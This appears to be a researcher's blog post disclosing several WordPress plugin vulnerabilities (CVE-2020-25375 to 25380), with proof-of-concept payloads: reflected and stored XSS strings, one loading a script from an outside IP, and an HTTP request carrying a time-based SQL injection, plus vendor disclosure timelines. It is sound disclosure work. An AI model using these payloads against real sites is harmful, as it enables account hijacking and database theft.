WordPress Plugin Bug Hunting – Part 2

This is part 2 of 2 thus far. See here for part 1 written up by Aaron.

———————————————————————————————————————————————————————————————————————–

CVE-2020-25376 – Bulk Change V1.0 – Reflected XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/bulk-change/
Vulnerable Version: 1.0
Total Downloads: 3,215
Active Installations: N/A
Author: hmayaktigranyan

Description

The `s` GET parameter in bulk-change.php is vulnerable to reflected XSS attacks.

POC
/wp-admin/tools.php?page=bulk-change%2Fbulk-change.php&per_page=10&dosearch=Search+...&change_posttype&bctp_action&s="><script+src%3Dhttps%3A%2F%2F161.35.8.179%3A4443%2Fxssalert.js><%2FsCript>

Will result in the following injected

Vulnerability

The Bulk Change page under Tools → Bulk Posts Change has a s GET parameter that is echoed out to a text input tag value without being sanitized.

The s parameter usually does not appear in the URL however can be manually added to display text inside the “Keyword” input box like so:

Closing off the input tag allows you to inject any other HTML tag you like, including </script> tags.
The inclusion of a </script> tag will result in a security error

However, changing the case of a single character will remove this error and allow you to execute JS.

Successful execution by change the letter casing in the closing tag
Timeline

18 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team

19 Jun 2020 – Reply from the WordPress Security team
19 Jun 2020 – WordPress Security team determines no patch will be applied by the original developer and the plugin is closed from further downloads
29 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-25377 – Ceceppa Multilingua v1.5.17 – Reflected XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/bulk-change/
Vulnerable Version: 1.5.17
Total Downloads: 81,781
Active Installations: N/A
Author: Alessandro Senese

The `tab` GET parameter in `settings.php` is vulnerable to reflected XSS attacks

POC
/wp-admin/admin.php?page=ceceppaml-backup-page&tab="><script>alert(1)script>

After closing the input tag with “> in the `tab` parameter, we can inject arbitrary HTML tags, including the <script> tags to execute JavaScript code.

XSS proof of concept

 

Timeline

19 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team

19 Jun 2020 – Reply from the WordPress Security team
19 Jun 2020 – WordPress Security team determines no patch will be applied by the original developer and the plugin is closed from further downloads
31 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-25375 – WP Smart CRM v1.8.7 – Authenticated Stored XSS – Multiple Vulnerabilities

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/wp-smart-crm-invoices-free/
Vulnerable Version: 1.8.7
Total Downloads: 16,200
Active Installations: N/A
Author: SoftradeWeb SNC

Description
Vulnerability 1

Business Name Field Steps to replicate.

 

    1. Go to Customers tab
      WP Smart CRM drop down

    2. Create a new customer by clicking New customer at the bottom left of the page.
    3. Add the payload <script>alert(1)</script> to the field Business Name and save the customer.
      XSS Execution
    4. The page will reload and execute the payload

 

Vulnerability 2

Tax Code Field Steps to replicate.

  1. Repeat steps 1 and 2 from the previous Business Name Field vulnerability.
  2. Add the payload "><script>alert(1)</script> to the Tax Code field

    3. Fill out the mandatory fields and save the customer.

Vulnerability etc.

The following fields are also vulnerable.

  1. First Name field
  2. Address field
  3. Town field
  4. Phone field
  5. Mobile field
  6. Place of Birth field
  7. Web Site field
  8. VAT Number field
  9. Last Name field
  10. Fax field
  11. Email field
  12. Skype field

 

Timeline

20 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team

20 Jun 2020 – Reply from the WordPress Security team
28 Jul 2020 – WordPress Security team determines no patch will be applied by the original developer and the plugin is closed from further downloads
31 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-25379 & CVE-2020-25380 – Recall Products v0.8 – Authenticated SQL injection and Stored XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/front-end-only-users/
Vulnerable Version: 0.8
Total Downloads: 1,018
Active Installations: N/A
Author: Mike Rooijackers

Authenticated SQL Injection
Description

Within the Recall Products Plugin the `Manufacturer[]` POST parameter is vulnerable to SQL injection when submitting a deletion request.

POC
POST /wp-admin/admin.php?page=recall-manufacturer HTTP/1.1
Host: headache.zeroaptitude.com
Connection: close
Content-Length: 208
Cache-Control: max-age=0
Origin: https://headache.zeroaptitude.com
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://headache.zeroaptitude.com/wp-admin/admin.php?page=recall-manufacturer
Accept-Encoding: gzip, deflate
Accept-Language: en-AU,en-GB;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: <cookies here>

page=recall-manufacturer&_wpnonce=55905377af&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drecall-manufacturer&action=delete&paged=1&manufacturer%5B%5D=(SELECT 2822 FROM (SELECT(SLEEP(5)))gsJu)&action2=-1
SQLMap dumping database
Vulnerable Code

SQLmap beginning to dump tables using the manufacturer parameter

Vulnerable PHP Code
Stored XSS

Stored XSS occurs when creating a new manufacturer by clicking the “add new” tab and providing a XSS payload as the manufacturer name. This payload will execute whenever a user visits the “manufacturer” tab.

Adding a new manufacturer but providing a XSS payload instead
Execution of the XSS payload when visiting the manufacturer tab
Timeline

27 Jul 2020 – Discovery and report submission to the WordPress Plugin Security Team

27 Jul 2020 – Reply from the WordPress Security team
10 Aug 2020 – Patch applied to fix the vulnerability
31 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-25378 – WP Floating Menu v1.3.0 – Reflected XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/front-end-only-users/
Vulnerable Version: 1.3.0
Total Downloads: 128,645
Active Installations: 10,000+
Author: AccessPress Themes

Description

The `id` GET parameter used by WP Floating menu does not correctly sanitize user input before reflecting the parameter back to the user. This results in a reflective XSS vulnerability that can be seen in the following example:

POC

The vulnerable code can be found in the wp-floating-menu/inc/backend/menu-actions/inner-fields/edit-menu-inner.php file.
The same potentially vulnerable code can be found in wp-floating-menu/inc/backend/template-actions/template-inner-fields/edit-template-inner.php

Vulnerable line echoing the ID parameter into a hidden input tag.
Timeline

28 Jul 2020 – Discovery and report submission to the WordPress Plugin Security Team

29 Jul 2020 – Reply from the WordPress Security team
16 Aug 2020 – Patch applied to fix the vulnerability
31 Aug 2020 – Public write up and CVE Submission

Leave a Reply

Your email address will not be published. Required fields are marked *